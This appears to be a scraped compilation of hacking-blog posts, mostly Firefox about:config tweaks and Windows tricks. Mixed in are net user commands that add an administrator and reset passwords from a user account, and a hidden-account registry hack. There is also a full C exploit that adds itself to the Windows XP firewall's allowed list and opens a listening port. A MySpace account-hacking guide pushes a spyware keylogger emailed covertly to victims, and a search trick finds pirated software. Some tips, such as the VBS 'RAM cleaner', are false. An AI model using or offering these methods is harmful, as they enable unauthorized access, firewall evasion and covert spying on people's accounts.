If you do not have access to Internet most of the time, you might want to increase the offline cache so that you can continue to work offline. By default, Firefox 3 caches 500MB of data from supported offline Web apps. You can change that value to whatever amount of your choice.

Config name: browser.cache.offline.capacity
Default: 512000 (in KB)
Modified value: any value higher than 512000 will increase the cache value


21) Auto Export Firefox 3 bookmarks to bookmarks.html

Unlike the previous version, Firefox 3 backup the bookmarks file in places.sqlite rather than the usual bookmarks.html. Since bookmarks.html allows us to export and sync our bookmarks with other browser, it will be very useful if Firefox 3 can backup the bookmark to the bookmarks.html as well.

Config name: browser.bookmarks.autoExportHTML
Default: False
Modified value: True (auto export bookmarks file to bookmarks.html)


22) Disable Extension Compatibility Checks

This is useful if you want to use an extension that is not supported by your version of Firefox badly. It is not recommended, but you can still do it at your own risk.

Right click and select New->Boolean. Enter extensions.checkCompatibility in the field. Enter False in the next field.

Right click again and select New->Boolean. Enter extensions.checkUpdateSecurity into the field and enter False into the next field.


23) Disable Delay Time When Installing Add-on

Everytime you wanted to install a Firefox add-on, you will have to wait for several secs before the actual installation starts. If you are tired of waiting, you can turn the function security.dialog_enable_delay off so that the installation will start immediately upon clicking.

Config name: security.dialog_enable_delay
Default: 2000 (in msec)
Modified value:

* 0 – start installation immediately
* any other value (in msec)


24) View Source in Your Favorite Editor

This is very useful for developers who are always using the ‘view source‘ function. This tweak allows you to view the source code in an external editor.

There are two configuration need to be made:
Config name: view_source.editor.external
Default: False
Modified value: True ( enable view source using external text editor)

Config name: view_source.editor.path
Default: blank
Modified value: insert the file path to your editor here.


25) Increasing ‘Save Link As‘ timeout value

When you right click and select the ‘Save Link As…‘, the browser will request the content disposition header from the URL so as to determine the filename. If the URL did not deliver the header within 1 sec, Firefox will issue a timeout value. This could happen very frequently in a slow network connection environment. To prevent this issue from happening frequently, you can increase the timeout value so as to reduce the possibility of a timeout.

Config name: Browser.download.saveLinkAsFilenameTimeout
Default: 1000 (1 sec)
Modified value: any value higher than 1000 (value is in msec)


26) Animate Fullscreen Toolbar Collapse mode

In Firefox’s fullscreen mode, toolbars and the tab strip are hidden at the top of the screen and only shown on mouseover. To draw attention to this, there is an animation of the toolbar sliding upwards and off-screen when fullscreen mode is toggled on. For performance issue, the animation of the collapse of the toolbar only appear for the first time. For some reason that you may love/hate the animation, you can adjust Browser.fullscreen.animateUp to switch it on/off for every collapse.

Config name: Browser.fullscreen.animateUp
Default: 1 (animate the toolbar collapse only the first time)
Modified value:

* 0 -disable the animation
* 2- enable the animation for every collapse


27) Autohide Toolbar in Fullscreen mode

In fullscreen mode, the toolbar is set to autohide and appear upon mouseover. If you have a need to view the toolbar at all time, you can toggle the value of browser.fullscreen.autohide to False to always show the toolbar.

Config name: browser.fullscreen.autohide
Default: True (always autohide)
Modified value: False (always show the toolbar)


28) Increase Add-On search result

If you go to Tools->Add-ons->Get Add-ons and perform a search there, Firefox will only fetch and display 5 matching results. If you want Firefox to show more than 5 results (say 10), you can adjust extensions.getAddons.maxResults to get it to display more results.

Config name: extensions.getAddons.maxResults
Default: 5
Modified value: any value more than 5

This list of about:config is definitely not the complete list. If you have any tricks not listed here, please add it in the comment.

Many of above about:config hacks are available in Older Firefox Version, at the end if some thing goes wrong then feel free to restore your about:config to older setting see the below image of how to restore about:config

Below are some Cool Firefox Tricks, just copy and paste it in your firefox browser's address bar :

chrome://browser/content/browser.xul
- Opens another Firefox inside a tab in the the existing Firefox window

chrome://browser/content/preferences/preferences.xul
- Opens Options dialog box inside the tab

chrome://browser/content/bookmarks/bookmarksPanel.xul :
- Opens BookMarks Manager inside the tab

chrome://browser/content/history/history-panel.xul
- Opens History Panel inside the tab.

chrome://mozapps/content/extensions/extensions.xul?type=extensions
- Opens Extensions window in the current tab

chrome://browser/content/preferences/cookies.xul
- Opens cookies window inside the tab

chrome://browser/content/preferences/sanitize.xul
- Opens Clear Private Data window inside the current tab

chrome://browser/content/aboutDialog.xul
- Opens About Firefox Dialog box inside the tab

chrome://global/content/alerts/alert.xul
- Dancing Firefox

Hack Youtube To Watch the Best Quality Videos


Whenever you connect to my youtube channel (http://www.youtube.com/),
if you see some videos can not watch with high quality, you can use this TIPS ...


Step1: Click to video that you want to see, the link will display on Address bar. E.x: http://www.youtube.com/user/wildminer?blend=6&ob=4

Step2: Add &fmt=6 to the end of that string. That address like:
http://www.youtube.com/user/wildminer?blend=6&ob=4&fmt=6

Enjoy it ! The higher quality video !!!

Step3: Add &fmt=18 to the end of that string, you'll have the best quality video with direct download link !
http://www.youtube.com/user/wildminer?blend=6&ob=4&fmt=18

Note: Appending &fmt=6 to the URL delivers a 448x336 resolution version of the video and appending &fmt=18 delivers a even better 480x360 resolution version.

Be Careful Before You ‘Like’ This on Facebook

Warning: If you receive news feed carrying any of the following links ‘Liked’ by any of your Facebook friends, don’t click on the link to check it out. It’s a clickjacking worm attack spreading through the ‘Like’ option and has affected hundreds of thousands of users.
These messages include: “LOL This girl gets OWNED after a POLICE OFFICER reads her STATUS MESSAGE,” “This man takes a picture of himself EVERYDAY for 8 YEARS!!,” “The Prom Dress That Got This Girl Suspended From School” and “This Girl Has An Interesting Way Of Eating A Banana .Check It Out!”

Clicking on any of these links takes you to a blank page saying “Click here to continue”. Clicking on this page then publishes the same message to your profile and news feed. The worm doesn’t harm in any other way but you’d rather be not carrying it in your account.

Security firm Sophos has identified the linked pages as being infected with the Troj/iframe-ET worm and has recommended deleting any such entries showing up in your news feed and also making sure no such WebPages have been linked to your Profile.

Speed up your PC


You may recognize that your system gets slower and slower when playing and working a lot with your pc. That's cause your RAM is full of remaining progress pieces you do not need any more.

So create a new text file on your desktop and call it ..
"RAMcleaner" or something...

Type

“FreeMem=Space(64000000)”
in this file and save it as “RAMcleaner.vbs” [ You may choose the "All Files" option when you save it ]

Run the file and your RAM will be cleaned,
Of course you can edit the code in the file for a greater "cleaning-progress".

FreeMem=Space(128000000)

Just try it out..

Hack Admin Password From User Mode

Hack Admin Password From User Mode
Disclaimer: Use this article for eductational purpose ONLY.

Follow these steps:
1. Open command prompt (Start->Run->cmd),

2. Enter the following command, then press ENTER

3. Enter the followin command, then press ENTER:
compmgmt.msc
This should open the computer management console.

4. Go to local users & groups->users. Right click on any user and select "set password".

If you get a "access denied" do the following:

start>run>cmd
then use following commands
1) net user test /add (this command will make test named user)
2) net localgroup administrators test /add (this command will make test user as administrators rights)

and use net user command to reset your admin. password



Alternative



What if u don't know the password of your admin and still want to hack and change .. yea u can do it ..in a very easy manner.. check this. just follow the steps.. this doesn't require u to know the admin password but still u can change it..
Start >> Run >> [type]cmd // this will open your command prompt
[type] net(space)user(press enter)
[type] net(space)user(space)[windowsloginid](sp ace)*(press enter)

// for e.g. : net user HOME *(press enter)

[type] new password (press enter) and retype it (press enter).. it will show u confirmation... // caution it wont show u the password u type.. but it still types.. the blinking pointer will b there at the same place.. but it still works..
// for e.g. : password changed successfully.

How To Create A Hidden User Account

This tweak allows an account that is normally displayed on the Welcome screen to be hidden from view. To log on using the account it's necessary to use the Log On To Windows dialog box similar to the one in Windows 2000.
#[Start] [Run] [Regedit]

#Registry Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList

#Modify/Create the Value Data Type(s) and Value Name(s) as detailed below
.
#Data Type: REG_DWORD [Dword Value] // Value Name: Type Name of Account to be Hidden

#Setting for Value data: [0 = Account is Hidden / 1 = Enabled]

#Exit Registry and Reboot...

While the account is hidden on the Welcome screen, note that the account profile will be visible in C:\Documents and Settings or wherever user profiles are stored as well as in Local Users and Groups.

How to lock your computer

Creating a desktop shortcut for locking your computerIf you use your computer in an area where others may have access to it, and there are things on your system you would rather have kept confidential, locking your desktop when you leave the computer is an essential task. Here's a recipe for a desktop shortcut that will lock your computer in two easy clicks:

Right click on an empty area of the desktop and choose 'new' then 'shortcut.' The create shortcut wizard will open; in the first text box, type '%windir%\System32\rundll32.exe user32.dll,LockWorkStation' and then give your shortcut an appropriate name on the next page, and hit 'finish.'

You will notice that the shortcut you created has a blank icon. To select a more appropriate one, right click on the shortcut and hit 'properties.' In the 'shortcut' tab, click the 'change icon' button.

In the 'look for icons in this file' box, type '%SystemRoot%\system32\SHELL32.dll' then click 'ok' to see a range of icons for your new shortcut. Choose an appropriate icon. Your desktop locking shortcut is now ready for use. Test it out.


Note: It is useful if u have an account as it will prompt for a password.

OR

Hide all drives in my computer
Wanna how your geekiness. Here's the registry hack to hide all the drives in my computer.

head up to
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
create a new DWORD value as NoDrives and modify its data to 03FFFFFF(six F's)

reboot and you are done.

To change back.
delete the key or modify the data to 0. (zero)

Address Resolution Protocol (ARP) Attacks

-: Address Resolution Protocol (ARP) Attacks :-
What Does ARP Mean?
Address Resolution Protocol (ARP) is a stateless protocol, was designed to map Internet Protocol addresses (IP) to their associated Media Access Control (MAC) addresses. This being said, by mapping a 32 bit IP address to an associated 48 bit MAC address via attached Ethernet devices, a communication between local nodes can be made.

On a majority of operating systems, such as Linux, FreeBSD, and other UNIX based operating systems, and even including Windows, the "arp" program is present. This program can be used to display and/or modify ARP cache entries.

An example of the "arp" utility's output would look like the following:

Windows:
> arp -a
Interface: 192.168.1.100 .- 0x10003
Internet Address Physical Address Type
192.168.1.1 00-13-10-23-9a-53 dynamic

Linux:
$ arp -na
? (192.168.1.1) at 00:90:B1:DC:F8:C0 [ether] on eth0

FreeBSD:
$ arp -na
? (192.168.1.1) at 00:00:0c:3e:4d:49 on bge0


How ARP works?
Specifically for Internet Protocol Version 4 (IPv4), ARP maps IP addresses between the Network layer and Data Link layer of the Open System Interconnection (OSI) model.
For a more complete and thorough explanation of how address resolution works, and protocol specifics, please consult RFC 826.


ARP Protocol Flaws :-
ARP's main flaw is in its cache. Knowing that it is possible for ARP to update existing entries as well as add to the cache, this leads one to believe that forged replies can be made, which result in ARP cache poisoning attacks.


Terms & Definitions :-
ARP Cache Poisoning : Broadcasting forged ARP replies on a local network. In a sense, "fooling" nodes on the network. This can be done because ARP lacks authentication features, thus blindly accepting any request and reply that is received or sent.

MAC Address Flooding : An ARP cache poisoning attack that is mainly used in switched environments. By flooding a switch with fake MAC addresses, a switch is overloaded. Because of this, it broadcasts all network traffic to every connected node. This outcome is referred to as "broadcast mode" because, all traffic passing through the switch is broadcasted out like a Hub would do. This then can result in sniffing all network traffic.


The ARP Attacks :-
1] Connection Hijacking & Interception : Packet or connection hijacking and interception is the act in which any connected client can be victimized into getting their connection manipulated in a way that it is possible to take complete control over.

2] Connection Resetting : The name explains itself very well. When we are resetting a client's connection, we are cutting their connection to the system. This can be easily done using specially crafted code to do so. Luckily, we have wonderful software that was made to aid us in doing so.

3] Man In The Middle : One of the more prominent ways of attacking another user in order to hijack their traffic, is by means of a Man In The Middle (MITM) attack. Unlike the other attacks, a MITM is more a packet manipulation attack which in the end however does result in packet redirection to the attacker . all traffic will get sent to the attacker doing the MITM attack. This attack however is specific. As opposed to MAC Address Flooding or other attacks against a router/switch, the MITM attack is against a victim, and also can be done outside of a switched environment. Thus meaning, an attack can be executed against a person on the other side of the country.

4] Packet Sniffing : Sniffing on a Local Area Network (LAN) is quite easy if the network is segmented via a hub, rather than a switch. It is of course possible to sniff on a switched environment by performing a MAC flood attack. As a result of the MAC flood, the switch will act as a hub, and allow the entire network to be sniffed. This gives you a chance to use any sort of sniffing software available to you to use against the network, and gather packets.

5] Denial of Service : MAC Address Flooding can be considered a Denial of service attack. The main idea of the MAC flood, is to generate enough packet data to send toward a switch, attempting to make it panic. This will cause the switch to drop into broadcast mode and broadcast all packet data. This however did not result in a crash, or the service to be dropped, but to be overloaded.

Bypassing Windows-XP Firewall

There is a technique using which we can bypass windows-xp service pack-2 firewall.This techniques is nothing but the vulnerability found in windows-xp sp2 firewall.
This is explained here in detail with exploit code.

Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall's registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.
* Microsoft Windows XP SP2
Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker.
If an attacker adds a new key to the registry address of HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List, the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning.
Proof of Concept :-
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List
Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat

Exploit :-
#include
#include
#include
#include
#include "Shlwapi.h"
int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];
HKEY hKey;
int i;
GetModuleFileName(NULL, filename, 1024);
strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");
RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

int temp, sockfd, new_fd, fd_size;
struct sockaddr_in remote_addr;
fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");
fprintf(stdout, "Dedicated to Katka H. from Levoca \n");
sleep(3);
if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;
for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);
if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);
fprintf(stdout, "Sended: Hello World\r\n");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
if (!strcmp(buffer, "quit"))
break;
}
ezsocket_exit();
return 0;
}
/* EoF */

ClickJacking attacks


Definition :-
"Clickjacking is a malicious technique of tricking web users into revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages." - Wikipedia

Introduction :-

A vulnerability across a variety of browsers and platforms, a clickjacking takes the form of embedded code or script that can execute without the user's knowledge, such as clicking on a button that appears to perform another function.
The long list of vulnerabilities involves browsers, Web sites and plug-ins like Flash.

How It Works? :-

ClickJacking is a little bit difficult to explain however try to imagine any button that you see in your browser from the Wire Transfer Button on your Bank, Post Blog button on your blog, Add user button on your web-site, Google Gadgets etc.
ClickJacking gives the attacker to ability to invisibly float these buttons on-top of other innocent looking objects in your browser.
So when you try to click on the innocent object, you are actually clicking on the malicious button that is floating on top invisibly.

In other words, the attack is thrown by a malicious web page embedding objects, possibly from a different site, such as framed documents or plugin content (Flash, Silverlight, Java…) which may lead to unwanted results if clicked by the current user (e.g. a “Delete all messages” button in your webmail or an advertisement banner in a click fraud scheme). Using DHTML, and especially CSS, the attacker can disguise or hide the click target in several ways which go completely undetected by the user, who’s easily tricked into clicking it in a more or less blind way.

javascript increases the effectiveness of these attacks hugely, because it can make our invisible target constantly follow the mouse pointer, intercepting user’s first click with no failure.
We can however imagine a few less effective but still feasible scriptless scenarios, e.g. covering the whole window with hidden duplicates of the target or overlaying an attractive element of the page, likely to be clicked (e.g. a game or a porn image link), with a transparent target instance.

Examples :-

1) Malicious camera spying using Adobe's Flash.
2) Flash, Java, SilverLight, DHTML Game or Application used to Spy on your Webcam and/or Microphone.

The best defense against ClickJacking attacks is to use Firefox with the NoScript add-on installed.


NoScript 1.8.9.2

Allow active content to run only from sites you trust,
and protect yourself against XSS and Clickjacking attacks...!

COMPLETE DETAILS ABOUT The TROJON HORSE


What is a Trojan ?
"A Trojan Horse, or Trojan, is a term used to describe malware that appears, to the user, to perform a desirable function but, in fact, facilitates unauthorized access to the user's computer system". - Wikipedia

"A Trojan horse is an apparently useful program containing hidden functions that can exploit the privileges of the user [running the program], with a resulting security threat.". - CERT Advisory

Types of Trojan :-

The different types of Trojan Horses are as follows-

1) Remote Access Trojans :- Abbreviated as RATs, a Remote Access Trojans are potentially the most damaging, designed to provide the attacker with complete control of the victim's system.

2) Data Sending Trojans :- A type of a Trojan horse that is designed to provide the attacker with sensitive data such as passwords, credit card information, log files, e-mail address or IM contact lists. They could install a keylogger and send all recorded keystrokes back to the attacker.

3) Destructive Trojans :- Once this Trojan is installed on your computer, it will begin to systematically or completely randomly delete information from your computer. This can include files, folders, registry entries, and important system files, which likely to cause the failure of your operating system.

4) Proxy Trojans :- A type of Trojan horse designed to use the victim's computer as a proxy server. This gives the attacker the opportunity to conduct illegal activities, or even to use your system to launch malicious attacks against other networks.

5) FTP Trojans :- A type of Trojan horse designed to open port 21 (FTP) and acts like an FTP server. Once installed, the attacker not only could download/upload files/programs to victim's computer but also install futher malware on your computer.

6) Security Software Disabler Trojan :- A type of Trojan horse designed stop or kill security programs such as an antivirus program or firewall without the user knowing. This Trojan type is normally combined with another type of Trojan as a payload.

7) DoS Attack Trojans :- These trojans are used by the attacker to launch a DoS/DDoS attack against some website or network or any individual. In this case they are well known as "Zombies".

How Trojan Works ?

Trojans typically consist of two parts, a client part and a server part. When a victim (unknowingly) runs a Trojan server on his machine, the attacker then uses the client part of that Trojan to connect to the server module and start using the Trojan. The protocol usually used for communications is TCP, but some Trojans' functions use other protocols, such as UDP, as well. When a Trojan server runs on a victim’s computer, it (usually) tries to hide somewhere on the computer; it then starts listening for incoming connections from the attacker on one or more ports, and attempts to modify the registry and/or use some other auto-starting method.

It is necessary for the attacker to know the victim’s IP address to connect to his/her machine. Many Trojans include the ability to mail the victim’s IP and/or message the attacker via ICQ or IRC. This system is used when the victim has a dynamic IP, that is, every time he connects to the Internet, he is assigned a different IP (most dial-up users have this). ADSL users have static IPs, meaning that in this case, the infected IP is always known to the attacker; this makes it considerably easier for an attacker to connect to your machine.

Most Trojans use an auto-starting method that allows them to restart and grant an attacker access to your machine even when you shut down your computer.

How Trojan Horses Are Installed ?

Infection from Trojans is alarmingly simple. Following are very common ways to become infected that most computer users perform on a very regular basis.
 Software Downloads
 Websites containing executable content (ActiveX control)
 Email Attachments
 Application Exploits (Flaws in a web applications)
 Social Engineering Attacks

Create An Ftp Server On Your PC


Process-1:
First of all u have to get an static IP-Address.
Need a a static ip-address for ur FTP Server.Necessity for getting this static ip-address is ur not suppose to use ur own IP-Address.The main reason is u dont want to show ur IP-Address to everyone , there are many other reasons too but leave them aside..

1) Goto no-ip & create urself a free account.

2) Now ur account been created & ll receive ur account password via mail to ur email address.

3) After getting ur password login to ur account of no-ip.com
4.After getting logged in, click upon add a HOST its on the left menu.

5) Type any hostname u want (eg:-abc) & select any domain from da given list (eg:-ftpserve.com) Click on Submit.

6) Now u have owned ur own static address (example: abc.serveftp.com)

7) Now click downloads button which is present above on the page & click on which operating system ur using & den download DNS update client or u can download it from here directly, this is for microsoft window users..

8) After getting downloaded, u have to install this software & login here with ur email addresss & p/w wen asked for it.

9) At last tick on da check box present at the static address.

10) U have ur own static web address.


Process-2:

Installation & setting of the FTP-Server

1) You have to install Serv-U 4.1.03 , download this software from here

2) Run Serv-U & use da wizard to setup ur FTP.

3) Click on next until u have been asked for IP-Address, leave it as it is & click upon next.

4) Enter ur domain name u have registered (example: abc.serveftp.com) it above in da domain field & click upon next.

5) U ll be asked for anonymous access, select No & click upon next.

6) Next u ll be asked for creating a named account, select yes & click upon next.

7) Choose any user name u wish (eg:-xyz) & clcik upon next.

8) Enter password for dis account (eg:-adc341) for security purpose choose difficult password.

9) U ll be asked for da home directory for the account which u have created above.Select directory & click upon next.

10) Click on yes for locking dis account to da home directory, doing dis da user cannot further move up into home directory, click upon next.

11) At last ur account has been created click finish.


Process-3:

Configuring the user accounts which u have been created.

1) On the left tree-menu, select da account which u have been created above & den click upon General Tab.

2) Goto Hide 'Hidden' Files.

3) Check Allow only and enter the number one in the box.

4) Set da maximum downloading speed upto wat extent u want.As this is an account so many ll be using so set it low(eg:-10-20) to save ur bandwidth.Don't leave it blank as uers can download with full bandwidth.

5) choose how many users u want to login at on time.It depends on ur connection speed try these (56 - 1, ISDN - 3, ADSL or cable - 5-6 users.)

6) Click upon Dir Access Tab.

7) Now u can c home folder here.Highlight it & make ur permission.

8) If u want only users to download check only these Read,List & Inherit.

9) If u want ur users to upload into ur server & bu tto only 1 particular folder but not to downlaod, click upon dat add button & then select dat folder, Now u have to highlight dat folder & set these permissions on dat folder.Check,Write,Appened,List,Create & Inherit after setting these permissions click on the arrow which is present at the bottom right-hand corner.U want dis upload folder 2 be list first, before da home folder.

10) If der is any folder which u dont want anyone to access it, & it is present in the home folder, den click da add button & den select da folder.Now u have to highlight dat folder & see dat no all da checkboxes are left.After doing this click upon upper arrow which is present at bottom right hand corner.

11) There are many things u can do, These are only the basics....

12) Your server is now ready to be connected..

13) Login with your username & password...

Create Your Own Instant Messenger Bot

-: Creating IM Bot :-

This quick tutorial will show you how to develop your own functional IM bot that works with Google Talk, Yahoo! Messenger, Windows Live and all other popular instant messaging clients.

To get started, all you need to know are some very basic programming skills (any language would do) and web space to host your “bot”.

For this example, I have created a dummy bot called “insecure” that listens to your IM messages. To see this live, add insecure@bot.im to your GTalk buddy list and start chatting.


f you like to write a personal IM bot, just follow these simple steps:-

Step 1: Go to www.imified.com and register a new account with a bot.

Step 2: Now it’s time to create a bot which is actually a simple script that resides on your public web server.
It could be in PHP, Perl, Python or any other language.

Example Hello World bot:
The example below illustrates just how easy it is to create a bot.
This example is coded in PHP.
<?php

switch ($_REQUEST['step']) {
case 1:
echo "Hi, what's your name?";
break;
case 2:
echo "Hi " . $_REQUEST['value1'] . ", where do you live?";
break;
case 3:
echo "Well, welcome to this hello world bot, " . $_REQUEST['value1'] . "
from " . $_REQUEST['value2'] . ".";
break;
}

?>

Step 3: Once your script is ready, put it somewhere on your web server and copy the full URL to the clipboard.

Step 4: Now login to your imified account, paste the script URL

Screen Name: insecure@bot.im
Bot Script URL: http://www.insecure.in/imbot.php

Step 5: Add that im bot your friends list. That’s it.

This is a very basic bot but the possibilities are endless.

For instance, you could write a bot that will send an email to all your close friends via a simple IM message. Or you could write one that will does currency conversion.

Dangerous Google Searching Trick - How To Find Almost Everything Using Google

Using this Dangerous Searching Technique You will be able to find everything like music,movies,cracks,full softwares,games,keygens.... In short everything... So To Know More read on...

DANGEROUS SEARCHING TECHNIQUES


In this Technique I will Show you How To Find files Using Various Hosts such as rapidshare, megaupload, hotfile etc.... You can choose your favourite host that you want...

So Let's Say You want to Download a Game say "Need for speed" (or anyother thing of your choice)...

STEPWISE DESCRIPTION:

1. Go to the Site www.google.com




2. Now type "Need for Speed" .


3. Now after typing your query type "rapidshare.com/files" (without quotes) as shown below.


4. Now Click on Search and See the results. You will suprise to See the Exact Results.



This Technique can be used to download anything such as ebooks,music,movies,video songs,softwares,cracks,keygens etc....

NOTE: After the Search Results Appears Links That You Should avoid as they are a piece of Waste:
1.rapidlibrary.com
2.rsfile.com
3.fileshunt.com
4.rapidog.com

Always Prefer the Results on Page 2 .

You can similarly You can do the search for Hotfile.com


Also:
If you need links from megaupload type megaupload.com/?d= instead of rapidshare.com/files.
Tags: Useful Articles

Some Ethical Hacking eBooks


-: Hacking Exposed-5 :-


One of the international best-selling. The book walks through how to use the more powerful and popular hacker software, including L0phtCrack. This new edition has been updated extensively, largely with the results of "honeypot" exercises (in which attacks on sacrificial machines are monitored) and Windows 2000 public security trials. There's a lot of new stuff on e-mail worms, distributed denial-of-service (DDoS) attacks, and attacks that involve routing protocols. Hacking Exposed wastes no time in explaining how to implement the countermeasures--where they exist--that will render known attacks ineffective.

-: Internet Denial Of Service :-


Internet Denial of Service sheds light on a complex and fascinating form of computer attack that impacts the confidentiality, integrity, and availability of millions of computers worldwide. It tells the network administrator, corporate CTO, incident responder, and student how DDoS attacks are prepared and executed, how to think about DDoS, and how to arrange computer and network defenses. It also provides a suite of actions that can be taken before, during, and after an attack. Inside, you'll find comprehensive information on the each and every topic relating denial-of-service attacks.

-: Computer Viruses For Dummies :-


It offers real, practical solutions to help ordinary users keep viruses out of their e-mail in-boxes-and explains how to respond when one slips through-
* In 2003, there was a major virus attack almost every month, which cost businesses worldwide an estimated $55 billion and did untold damage to home computers.
* Explains what viruses are and how they work, profiles major anti-virus software packages, shows how to keep anti-virus software updated, and helps people adopt safer computer work habits.
* The book’s value price and compact size will make it irresistible to people who need to protect their home PC or network.

-: Hackin9 :-


This book will help you learn :-
* How to use Google to find sources of personal information and other confidential data.
* How to find information about vulnerable systems and Web services.
* How to locate publicly available network devices using Google.

Folder Lock Without Any Software

Folder Lock With Password Without Any Software-
Paste the code given below in notepad and 'Save' it as batch file (with extension '.bat').

Any name will do.
Then you see a batch file. Double click on this batch file to create a folder locker.
New folder named 'Locker' would be formed at the same location.
Now bring all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock the folder namely 'Locker'.
If you want to unlock your files,double click the batch file again and you would be prompted for password.
Enter the password and enjoy access to the folder.


if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

How to Hack a MySpace Account

MySpace is one of the most widely used Social Networking website by many teenagers and adults acropss the globe. I have seen many cheaters create secret Myspace accounts in order to exchange messages with another person and have secret relationships. So, it’s no wonder many people want to know how to hack a Myspace account. In this post I’ll give you the real and working ways to hack a Myspace.
THINGS YOU SHOULD KNOW BEFORE PROCEEDING

With my experience of about 6 years in the field of Hacking and IT security, I can tell you that there are only TWO ways to hack a Myspace: They are Keylogging and Phishing. All the other ways are scams! Here is a list of facts about Myspace hacking.

1. There is no ready made software or program that can hack Myspace just by entering the target username or URL. If you come accross a site that claims to sell a program to hack Myspace then it’s 100% scam.

2. Never trust any Hacking Service that claims to hack a Myspace account just for $100 or $200. All the them are scams.

The following are the only 2 foolproof methods to hack Myspace.
1. HOW TO HACK MYSPACE – The Easiest Way

The easiest way to hack Myspace is by using a keylogger (Spy Software). It doesn’t matter whether or not you have physical access to the target computer. Hacking Myspace becomes just a cakewalk if you use a keylogger since it doesn’t need any technical knowledge. Anyone with a basic knowledge of computers can use keyloggers.

1. What is a keylogger?

A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer’s keyboard. A keylogger is also called as a Spy software or Spy program.

2. Where is keylogger program available?

There exists tons of keyloggers on the internet, but most of them are useless and doesn’t turn out to be effective. But with my experience I recommend the following keylogger as the best to hack Myspce since it supports remote installation.
1. HOW TO HACK MYSPACE – The Easiest Way

The easiest way to hack Myspace is by using a keylogger (Spy Software). It doesn’t matter whether or not you have physical access to the target computer. Hacking Myspace becomes just a cakewalk if you use a keylogger since it doesn’t need any technical knowledge. Anyone with a basic knowledge of computers can use keyloggers.

1. What is a keylogger?

A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer’s keyboard. A keylogger is also called as a Spy software or Spy program.

2. Where is keylogger program available?

There exists tons of keyloggers on the internet, but most of them are useless and doesn’t turn out to be effective. But with my experience I recommend the following keylogger as the best to hack Myspce since it supports remote installation.

http://www.sniperspy.com/

3. How to install a keylogger?

Keyloggers can be installed just like any other program. At the installation time, you need to set your secret password and hotkey combination, to unhide the keylogger program whenever it is needed. This is because, after installation the keylogger becomes completely invisible and start running in the background. Because of it’s stealth behaviour the victim can never come to know about that the presence of the keylogger software on his/her computer.

4. I don’t have physical access to the target computer, can I still use Sniperspy?
It doesn’t matter whether or not you have physical access to the victim’s computer.
Because SniperSpy offers Remote Installation Feature. So, you can hack Myspace remotely installing the keylogger on the target PC.

You can attach the keylogger with any file such as image, MS excel file or other programs and send it to the victim via email. When the victim runs the file, it will automatically get installed without his knowledge and start recording every activity on his computer. The logs containing these activities are sent to you by the keylogger software via email or FTP.

5. What if the target user (victim) refuses to run the attached file?

Sometimes the victim may refuse to run the attachment that you send via email because of suspicion.

6. How can a keylogger hack Myspace account?

You can hack Myspace using keylogger as follows: You install the keylogger on a Remote PC (or on your local PC). The victim is unaware of the presence of the keylogger on his computer. As usual, he logs into his Myspace account by typing the Myspace username and password. These details are recorded and sent to your Sniperspy account. You can login to your Sniperspy account to see the password. Now you have successfully hacked the Myspace account.

In case if you install the keylogger on your local PC, you can obtain the recorded Myspace password just by unhiding the keylogger program.

7. Why SniperSpy is the best?



I have given a complete review of SniperSpy in my new post Which Spy Software to Choose. This should answer your question.

So what are you waiting for? Go grab it.

For a complete installation guide and more information on SniperSpy visit the following link:
